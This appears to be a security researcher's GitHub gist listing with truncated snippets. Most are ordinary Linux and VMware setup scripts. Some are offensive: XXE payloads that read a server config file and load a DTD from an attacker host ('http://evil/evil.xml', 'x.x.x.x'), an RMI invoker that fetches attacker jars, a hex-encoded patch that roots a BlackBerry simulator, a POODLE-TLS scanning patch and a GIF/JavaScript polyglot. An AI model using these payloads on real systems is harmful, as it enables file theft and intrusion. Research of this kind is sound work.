
Etienne Stalmans staaldraad

@staaldraad
staaldraad / setWireshark
Last active Aug 29, 2015
Run wireshark without having to be root
#!/bin/bash
if [ "$1" != "" ]; then
USERNAME=$1
else
echo "ERROR: no username supplied"
echo "Using current user"
USERNAME=`whoami`
fi
@staaldraad
staaldraad / vmware_installfix
Created Feb 22, 2014
VMware Workstation 10 on Fedora 20 or kernel 3.13+ systems
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to VMware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/
# Fix the vmnet module build
cd /usr/lib/vmware/modules/source/
curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch
tar xf vmnet.tar
@staaldraad
staaldraad / gist:2f0d2ba4aa6afb0dd36f
Last active Aug 29, 2015
Update kernel paths for Ubuntu + vmware-player
vmware-installer -u vmware-player
http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html
@staaldraad
staaldraad / crypt_setup.sh
Last active Aug 29, 2015
Setup crypt container
#create new file to use as container
#dd if=/dev/zero of=test.img count=5000k
fallocate -l 1G test.img
#create luks wrapper around the container file created above (same path throughout)
cryptsetup -v -y luksFormat test.img
cryptsetup luksOpen test.img cryptname
cryptsetup -v status cryptname
#make into filesystem
@staaldraad
staaldraad / PatchBB10Simulator.sh
Created Jun 18, 2014
Root Blackberry Simulator
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk
@staaldraad
staaldraad / xxe
Created Jul 7, 2014
XXE remote dtd
Payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
@staaldraad
staaldraad / pyrmi.py
Last active Dec 1, 2018
Quick and dirty RMI invoker
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
staaldraad / XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@staaldraad
staaldraad / poodle-tls-go.patch
Created Dec 9, 2014
Patch Go libs for poodle-tls scan - Modified from https://gist.github.com/singe/f433c54f134a9390214e to work with Go 1.3.3 for Linux. -- These are mods to Adam Langley's (@agl__) work.
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000
@@ -301,6 +301,8 @@
// be used.
CurvePreferences []CurveID
+ BreakCBCPadding bool
+
serverInitOnce sync.Once // guards calling (*Config).serverInit
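Review bot: the new exported field `BreakCBCPadding bool` is added to `Config` without a doc comment, while the neighbouring `CurvePreferences` carries one; add a comment stating that it makes the TLS stack emit deliberately malformed CBC padding for POODLE-TLS scanning only, so that nobody reading the `Config` struct mistakes it for a production option. Since this patch modifies the standard library's `crypto/tls` in place, the comment should also say the patched tree is for the scanner build and not for general use.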
@staaldraad
staaldraad / gifjs
Created Jan 4, 2015
GIF that is also Javascript (via Ange Albertini at 31C3 - https://speakerdeck.com/ange/funky-file-formats-31c3)
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");